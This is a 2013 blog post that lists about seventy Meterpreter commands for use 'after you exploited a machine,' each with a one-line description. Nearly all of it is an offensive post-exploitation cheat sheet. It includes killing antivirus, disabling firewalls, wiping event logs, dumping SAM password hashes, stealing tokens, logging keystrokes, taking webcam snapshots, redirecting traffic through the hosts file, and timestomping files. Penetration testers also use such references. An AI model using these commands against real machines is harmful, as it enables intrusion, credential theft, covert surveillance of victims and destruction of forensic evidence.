Thursday 10 October 2013

Some Important Meterpreter Commands after you exploited a machine

Meterpreter Commands




1. sysinfo -----> shows the system build x86 or x64, language version, build...etc

2. run checkvm    ------>  checks to see if the victim is running a Virtual Machine or native.

3. route   --------> Dumps the routing table to the screen and shows how the subnet has been configured...etc

4. run get_application_list  -------> This shows you applications installed on the remotye PC

5. uictl  --------->  Control Some of the User Interface Compon­ents

6. idletime ----->  shows how long the victim has not been active on the computer.

7. getpid ---------> This is to get the process ID and shows the process of which you are currently running off of.

8. getuid -------> This will show you the system identity and show you who you are running as such as system.

9. ps ------> This shows all the processes running on the victim as well as the PID's

10. run get_env -------> This willl give you a lot of info on the system

11. ifconfig and ipconfig -----> Find out the IPaddress and see how many adapters are enabled.

12. ? ------> Shows a list of different commands.

13. getsystem -----> attempts give you local system privelages

14. reboot ------> Reboot the remote machine

15. sc config process_name start= disabled  --------> stops a process from starting on next system reboot "process_name" is the name of the proces you want to disable.

16. clearev -------> Wipes all event logs.

17. execute -f cmd.exe -H -c  ------>  Open a command prompt on a hidden channel.

18. interact 1  ------> interact with a channel "1" will be replaced with the chgannel you want to interact with.

19. download  -------> This command will download the specified command.  "Example"    download c:\\boot.ini

20. upload --------> upload files to the victim machine

21. portfwd ------> forward a local port to a remote service

22. run getgui -e  ------> this will enable remote desktop on the victim.

23. run gettelnet –e  -------> To enable telnet on remote machine.

24. run getcountermeasure  ------>  checks the security configuration on the exploited machine and it can disable countermeasures such as AV, firewalls, etc

25. run killav  ------->   it is designed to kill most AVs that are running as a service on the exploited machine. Works on sum but not all AV's.

26. run get_local_subnets  ------>  used to get the local subnet of the victim machine.

27. run hostedit  ------->  allows the attacker to add entries to the Windows host file.  As a result of Windows checking the hosts file first, we can divert traffic to a fake entry

28. run remotewinenum  -------> designed to enumerate the target system with the wmic command

30. run winenum ------->  used for system enumeration.  It will dump tokens, hashes, and issue both net and wmic commands

31. run scraper  -------->  used for grabbing additional system information not included in the other system enumerating scripts, such as the “entire registry.”

32. migrate  --------> Migrate to Another Process such as explorer.exe so you don't loose your session.

33. cat  ------->  Read the Contents of a File to the Screen

34. background  "or ctrl + z"  -------->  Back­ground the Current Session

35. irb -------> Drop into irb Scripting Mode

36. interact  --------> Interact with a Channel

37. load ------> Load One or More Meterp­reter Extensions.

38. channel  -------> Displays Info About Active Channels

39. bgkill  --------->  Kill a Background Meterp­reter Script

40. close  -------->  Close a Channel

41. enumdesktops  -------->  List All Accessible Desktops and Window Stations

42. getdesktop  ------->  Get the Current Meterp­reter Desktop

43. lpwd  -------->  Print Local Working Directory

44. ls  -------->  list Files

45. rm  -------->  Delete the Specified File

46. search  -------->  Search for Files.

47. upload  ------>  Upload File to Target

48. keyscan_start  -------->  Start Capturing Keystrokes

49. keyscan_stop Stop Capturing Keystrokes

49. keyscan_dump  -------->   Dump the Keystroke Buffer

50. screenshot  -------->   Scre­enshot of the GUI

51. setdesktop  --------->  Change the Meterp­reters Current Desktop.

52. getprivs  --------->  Attempt to Enable All Privileges Available to the Current Process

53. kill -------->  Terminate a Process    "Example"   kill 1834

54. reboot  -------->  Reboots the Remote Computer

55. reg  --------->  Interact with the Remote Registry.

56. rev2self  --------->  Calls Revert­ToS­elf() on the Remote Machine

57. shell  --------> Drop into a system shell.

58. shutdown  -------->  Shuts Down the Remote Computer

59. steal_token  ------>  Attempt to Steal an Impersonation Token from the Process

60. webcam_list  -------->  List webcams

61. webcam_snap  ------->  Take a snapshot from the specified webcam.

62. hashdump  -------->  Dumps the content of the SAM Database.

63. timestomp  ------->  Manipulates MACE Attributes

64. execute  ------> Execute a command.

65. info  -------->  Display info about active post module.

66. quit  -------->  Terminate the meterpreter session.

67. getwd  ------->  Print Working Directory

68. mkdir  ------->  make directory.

69. pwd  -------> print working directory.

70. drop_token  ------->  Relinquishes Any Active Impersonation Token

71. rmdir  --------> remove directory.

72. del  -------> delete file "exmple"  del passwords.txt
Admin at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)